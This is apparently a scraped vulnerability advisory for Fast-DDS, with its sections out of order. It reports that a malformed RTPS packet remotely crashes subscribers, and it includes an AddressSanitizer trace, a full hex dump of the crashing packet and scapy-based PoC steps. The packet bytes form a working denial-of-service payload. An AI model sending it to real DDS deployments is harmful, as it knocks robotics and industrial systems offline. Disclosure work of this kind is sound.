- FastCDR commit 3c6195aefd11d46395caf7d8b29019b5ef5aaefd (HEAD -> master, origin/master, origin/HEAD, origin/2.1.x)
- FastDDS commit e94c4b1b0a51f6be0aa04ad44624b0edf741419d (HEAD -> 2.13.1, tag: v2.13.1, origin/2.13.1)
=================================================================
==88545==ERROR: AddressSanitizer: allocator is out of memory trying to allocate 0x20c02b5e80 bytes
#0 0x7d4e0d in operator new(unsigned long) /home/nnelson/Documents/llvm-project/llvm/utils/release/final/llvm-project/compiler-rt/lib/asan/asan_new_delete.cpp:99:3
#1 0xbb9938 in std::__new_allocator<eprosima::fastrtps::rtps::Property>::allocate(unsigned long, void const*) /usr/bin/../lib/gcc/x86_64-linux-gnu/12/../../../../include/c++/12/bits/new_allocator.h:137:27
#2 0xbb9938 in std::allocator_traits<std::allocator<eprosima::fastrtps::rtps::Property> >::allocate(std::allocator<eprosima::fastrtps::rtps::Property>&, unsigned long) /usr/bin/../lib/gcc/x86_64-linux-gnu/12/../../../../include/c++/12/bits/alloc_traits.h:464:20
#3 0xbb9938 in std::_Vector_base<eprosima::fastrtps::rtps::Property, std::allocator<eprosima::fastrtps::rtps::Property> >::_M_allocate(unsigned long) /usr/bin/../lib/gcc/x86_64-linux-gnu/12/../../../../include/c++/12/bits/stl_vector.h:378:20
#4 0xbb9938 in std::vector<eprosima::fastrtps::rtps::Property, std::allocator<eprosima::fastrtps::rtps::Property> >::_M_default_append(unsigned long) /usr/bin/../lib/gcc/x86_64-linux-gnu/12/../../../../include/c++/12/bits/vector.tcc:657:34
==88545==HINT: if you don't care about these errors you may set allocator_may_return_null=1
SUMMARY: AddressSanitizer: out-of-memory /home/nnelson/Documents/llvm-project/llvm/utils/release/final/llvm-project/compiler-rt/lib/asan/asan_new_delete.cpp:99:3 in operator new(unsigned long)
Thread T2 created by T0 here:
#0 0x78fb7a in pthread_create /home/nnelson/Documents/llvm-project/llvm/utils/release/final/llvm-project/compiler-rt/lib/asan/asan_interceptors.cpp:214:3
#1 0xcc436c in eprosima::thread::start_thread_impl(int, void* (*)(void*), void*) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/utils/thread_impl/thread_impl_pthread.ipp:63:19
#2 0x1a0e884 in eprosima::thread::thread<eprosima::thread eprosima::create_thread<eprosima::fastdds::rtps::UDPChannelResource::UDPChannelResource(eprosima::fastdds::rtps::UDPTransportInterface*, asio::basic_datagram_socket<asio::ip::udp, asio::execution::any_executor<asio::execution::context_as_t<asio::execution_context&>, asio::execution::detail::blocking::never_t<0>, asio::execution::prefer_only<asio::execution::detail::blocking::possibly_t<0> >, asio::execution::prefer_only<asio::execution::detail::outstanding_work::tracked_t<0> >, asio::execution::prefer_only<asio::execution::detail::outstanding_work::untracked_t<0> >, asio::execution::prefer_only<asio::execution::detail::relationship::fork_t<0> >, asio::execution::prefer_only<asio::execution::detail::relationship::continuation_t<0> > > >&, unsigned int, eprosima::fastrtps::rtps::Locator_t const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, eprosima::fastdds::rtps::TransportReceiverInterface*, eprosima::fastdds::rtps::ThreadSettings const&)::$_0, unsigned int>(eprosima::fastdds::rtps::UDPChannelResource::UDPChannelResource(eprosima::fastdds::rtps::UDPTransportInterface*, asio::basic_datagram_socket<asio::ip::udp, asio::execution::any_executor<asio::execution::context_as_t<asio::execution_context&>, asio::execution::detail::blocking::never_t<0>, asio::execution::prefer_only<asio::execution::detail::blocking::possibly_t<0> >, asio::execution::prefer_only<asio::execution::detail::outstanding_work::tracked_t<0> >, asio::execution::prefer_only<asio::execution::detail::outstanding_work::untracked_t<0> >, asio::execution::prefer_only<asio::execution::detail::relationship::fork_t<0> >, asio::execution::prefer_only<asio::execution::detail::relationship::continuation_t<0> > > >&, unsigned int, eprosima::fastrtps::rtps::Locator_t const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, eprosima::fastdds::rtps::TransportReceiverInterface*, eprosima::fastdds::rtps::ThreadSettings const&)::$_0, eprosima::fastdds::rtps::ThreadSettings const&, char const*, unsigned int)::'lambda'()>(int, eprosima::fastdds::rtps::UDPChannelResource::UDPChannelResource(eprosima::fastdds::rtps::UDPTransportInterface*, asio::basic_datagram_socket<asio::ip::udp, asio::execution::any_executor<asio::execution::context_as_t<asio::execution_context&>, asio::execution::detail::blocking::never_t<0>, asio::execution::prefer_only<asio::execution::detail::blocking::possibly_t<0> >, asio::execution::prefer_only<asio::execution::detail::outstanding_work::tracked_t<0> >, asio::execution::prefer_only<asio::execution::detail::outstanding_work::untracked_t<0> >, asio::execution::prefer_only<asio::execution::detail::relationship::fork_t<0> >, asio::execution::prefer_only<asio::execution::detail::relationship::continuation_t<0> > > >&, unsigned int, eprosima::fastrtps::rtps::Locator_t const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, eprosima::fastdds::rtps::TransportReceiverInterface*, eprosima::fastdds::rtps::ThreadSettings const&)::$_0&&) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/utils/thread_impl/thread_impl_custom.hpp:88:23
#3 0x1a0e884 in eprosima::thread eprosima::create_thread<eprosima::fastdds::rtps::UDPChannelResource::UDPChannelResource(eprosima::fastdds::rtps::UDPTransportInterface*, asio::basic_datagram_socket<asio::ip::udp, asio::execution::any_executor<asio::execution::context_as_t<asio::execution_context&>, asio::execution::detail::blocking::never_t<0>, asio::execution::prefer_only<asio::execution::detail::blocking::possibly_t<0> >, asio::execution::prefer_only<asio::execution::detail::outstanding_work::tracked_t<0> >, asio::execution::prefer_only<asio::execution::detail::outstanding_work::untracked_t<0> >, asio::execution::prefer_only<asio::execution::detail::relationship::fork_t<0> >, asio::execution::prefer_only<asio::execution::detail::relationship::continuation_t<0> > > >&, unsigned int, eprosima::fastrtps::rtps::Locator_t const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, eprosima::fastdds::rtps::TransportReceiverInterface*, eprosima::fastdds::rtps::ThreadSettings const&)::$_0, unsigned int>(eprosima::fastdds::rtps::UDPChannelResource::UDPChannelResource(eprosima::fastdds::rtps::UDPTransportInterface*, asio::basic_datagram_socket<asio::ip::udp, asio::execution::any_executor<asio::execution::context_as_t<asio::execution_context&>, asio::execution::detail::blocking::never_t<0>, asio::execution::prefer_only<asio::execution::detail::blocking::possibly_t<0> >, asio::execution::prefer_only<asio::execution::detail::outstanding_work::tracked_t<0> >, asio::execution::prefer_only<asio::execution::detail::outstanding_work::untracked_t<0> >, asio::execution::prefer_only<asio::execution::detail::relationship::fork_t<0> >, asio::execution::prefer_only<asio::execution::detail::relationship::continuation_t<0> > > >&, unsigned int, eprosima::fastrtps::rtps::Locator_t const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, eprosima::fastdds::rtps::TransportReceiverInterface*, eprosima::fastdds::rtps::ThreadSettings const&)::$_0, eprosima::fastdds::rtps::ThreadSettings const&, char const*, unsigned int) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/utils/threading.hpp:95:12
#4 0x1a0e884 in eprosima::fastdds::rtps::UDPChannelResource::UDPChannelResource(eprosima::fastdds::rtps::UDPTransportInterface*, asio::basic_datagram_socket<asio::ip::udp, asio::execution::any_executor<asio::execution::context_as_t<asio::execution_context&>, asio::execution::detail::blocking::never_t<0>, asio::execution::prefer_only<asio::execution::detail::blocking::possibly_t<0> >, asio::execution::prefer_only<asio::execution::detail::outstanding_work::tracked_t<0> >, asio::execution::prefer_only<asio::execution::detail::outstanding_work::untracked_t<0> >, asio::execution::prefer_only<asio::execution::detail::relationship::fork_t<0> >, asio::execution::prefer_only<asio::execution::detail::relationship::continuation_t<0> > > >&, unsigned int, eprosima::fastrtps::rtps::Locator_t const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, eprosima::fastdds::rtps::TransportReceiverInterface*, eprosima::fastdds::rtps::ThreadSettings const&) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/rtps/transport/UDPChannelResource.cpp:51:12
#5 0x18f5db8 in eprosima::fastdds::rtps::UDPTransportInterface::CreateInputChannelResource(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, eprosima::fastrtps::rtps::Locator_t const&, bool, unsigned int, eprosima::fastdds::rtps::TransportReceiverInterface*) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/rtps/transport/UDPTransportInterface.cpp:233:50
#6 0x18f53a7 in eprosima::fastdds::rtps::UDPTransportInterface::OpenAndBindInputSockets(eprosima::fastrtps::rtps::Locator_t const&, eprosima::fastdds::rtps::TransportReceiverInterface*, bool, unsigned int) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/rtps/transport/UDPTransportInterface.cpp:207:34
#7 0x103cf92 in eprosima::fastdds::rtps::UDPv4Transport::OpenInputChannel(eprosima::fastrtps::rtps::Locator_t const&, eprosima::fastdds::rtps::TransportReceiverInterface*, unsigned int) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/rtps/transport/UDPv4Transport.cpp:338:19
#8 0xf2f774 in eprosima::fastrtps::rtps::ReceiverResource::ReceiverResource(eprosima::fastdds::rtps::TransportInterface&, eprosima::fastrtps::rtps::Locator_t const&, unsigned int) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/rtps/network/ReceiverResource.cpp:46:24
#9 0xf2a626 in eprosima::fastrtps::rtps::NetworkFactory::BuildReceiverResources(eprosima::fastrtps::rtps::Locator_t&, std::vector<std::shared_ptr<eprosima::fastrtps::rtps::ReceiverResource>, std::allocator<std::shared_ptr<eprosima::fastrtps::rtps::ReceiverResource> > >&, unsigned int) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/rtps/network/NetworkFactory.cpp:101:25
#10 0xf44895 in eprosima::fastrtps::rtps::RTPSParticipantImpl::createReceiverResources(eprosima::fastdds::rtps::LocatorList&, bool, bool, bool) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/rtps/participant/RTPSParticipantImpl.cpp:1730:38
#11 0xf407aa in eprosima::fastrtps::rtps::RTPSParticipantImpl::RTPSParticipantImpl(unsigned int, eprosima::fastrtps::rtps::RTPSParticipantAttributes const&, eprosima::fastrtps::rtps::GuidPrefix_t const&, eprosima::fastrtps::rtps::GuidPrefix_t const&, eprosima::fastrtps::rtps::RTPSParticipant*, eprosima::fastrtps::rtps::RTPSParticipantListener*) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/rtps/participant/RTPSParticipantImpl.cpp:381:5
#12 0xf45ae6 in eprosima::fastrtps::rtps::RTPSParticipantImpl::RTPSParticipantImpl(unsigned int, eprosima::fastrtps::rtps::RTPSParticipantAttributes const&, eprosima::fastrtps::rtps::GuidPrefix_t const&, eprosima::fastrtps::rtps::RTPSParticipant*, eprosima::fastrtps::rtps::RTPSParticipantListener*) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/rtps/participant/RTPSParticipantImpl.cpp:479:7
#13 0x8ad771 in eprosima::fastdds::dds::DomainParticipantImpl::enable() /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/fastdds/domain/DomainParticipantImpl.cpp:277:16
#14 0xd09b78 in eprosima::fastdds::statistics::dds::DomainParticipantImpl::enable() /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/statistics/fastdds/domain/DomainParticipantImpl.cpp:254:52
#15 0x8f0a2a in eprosima::fastdds::dds::DomainParticipant::enable() /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/fastdds/domain/DomainParticipant.cpp:110:36
#16 0x7d8269 in HelloWorldSubscriber::init() /mnt/EAE2CD0AE2CCDBC7/lab/crash_packet_reply/src/HelloWorldSubscriber.cpp:136:66
#17 0x7d79da in main /mnt/EAE2CD0AE2CCDBC7/lab/crash_packet_reply/src/HelloWorldSubscriber.cpp:193:15
==88545==ABORTING
0000 52 54 50 53 02 03 01 0f 01 0f 39 78 fc 44 e9 f0 RTPS......9x.D..
0010 00 00 00 00 09 01 08 00 00 ae ac 65 d9 cf 58 50 ...........e..XP
0020 15 05 80 01 00 00 10 00 00 01 00 c7 00 01 00 c2 ................
0030 00 00 00 00 01 00 00 00 00 03 00 00 15 00 04 00 ................
0040 02 03 00 00 16 00 04 00 01 0f 00 00 50 00 10 00 ............P...
0050 01 0f 39 78 fc 44 e9 f0 00 00 00 00 00 00 01 c1 ..9x.D..........
0060 32 00 18 00 01 00 00 00 f6 1c 00 00 00 00 00 00 2...............
0070 00 00 00 00 00 00 00 00 82 cb 92 26 31 00 18 00 ...........&1...
0080 01 00 00 00 f7 1c 00 00 00 00 00 00 00 00 00 00 ................
0090 00 00 00 00 82 cb 92 26 02 10 08 00 14 00 00 00 .......&........
00a0 00 00 00 00 58 00 04 00 3f 0c 0f 00 62 00 14 00 ....X...?...b...
00b0 10 00 00 00 50 61 72 74 69 63 69 70 61 6e 74 5f ....Participant_
00c0 70 75 62 00 59 00 d8 00 04 00 00 00 11 00 00 00 pub.Y...........
00d0 50 41 52 54 49 43 49 50 41 4e 54 5f 54 59 50 45 PARTICIPANT_TYPE
00e0 00 00 00 00 07 00 00 00 53 49 4d 50 4c 45 00 00 ........SIMPLE..
00f0 1b 00 00 00 66 61 73 74 64 64 73 2e 70 68 79 73 ....fastdds.phys
0100 69 63 61 6c 5f 64 61 74 61 2e 68 6f 73 74 00 00 ical_data.host..
0110 2f 00 00 00 69 34 2d 67 6c 2d 74 6d 6b 35 39 30 /...i4-gl-tmk590
0120 34 2d 33 2e 61 64 2e 70 73 75 2e 65 64 75 3a 32 4-3.ad.psu.edu:2
0130 30 32 34 36 31 30 34 32 33 38 31 39 31 34 31 31 0246104238191411
0140 32 30 00 00 1b 00 00 00 66 61 73 74 64 64 73 2e 20......fastdds.
0150 70 68 79 73 69 63 61 6c 5f 64 61 74 61 2e 75 73 physical_data.us
0160 65 72 00 00 08 00 00 00 64 6d 72 36 35 34 32 00 er......dmr6542.
0170 1e 00 00 00 66 61 73 74 64 64 73 2e 70 68 79 73 ....fastdds.phys
0180 69 63 61 6c 5f 64 61 74 61 2e 70 72 6f 63 65 73 ical_data.proces
0190 73 00 00 00 07 00 00 00 33 34 35 33 34 30 00 00 s.......345340..
01a0 01 00 00 00 80 01 38 00 01 00 00 00 f4 1c 00 00 ......8.........
01b0 00 00 00 00 00 00 00 00 00 00 00 00 7f 00 00 01 ................
01c0 00 ae ac 65 aa ee 1e 6a 09 00 00 00 00 00 00 00 ...e...j........
01d0 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
If the bug is not reproduced, the bug may be reproduced if you try multiple times.
This can remotely crash any Fast-DDS process, potentially leading to a DOS attack.
Summary
When publisher serving malformed
RTPS
packet, subscriber crashes when creatingpthread
. These vulnerability might be remotely crash FastDDS.Details
Version
When running sample subscriber, and publisher serve malformed
RTPS
packet, subscriber crashes when cratingpthread
.Here are ASAN detailed log:
Here are malformed packet (TS + DATA)
PoC
1. Install Fast-DDS with given scripts(options):
2. Run this PoC Project
https://drive.google.com/file/d/19W5UC52hPnAqVq_boZWO45d1TJ4WoCSh/view?usp=sharing (*Sorry for external upload, github blocked .zip or .tar.xz uploads)
pip3 install scapy python3 runner.py # (Keep Pressing Enter for sending packets)
If the bug is not reproduced, the bug may be reproduced if you try multiple times.
01-26-2024.03.56.56.PM.webm
Impact
This can remotely crash any Fast-DDS process, potentially leading to a DOS attack.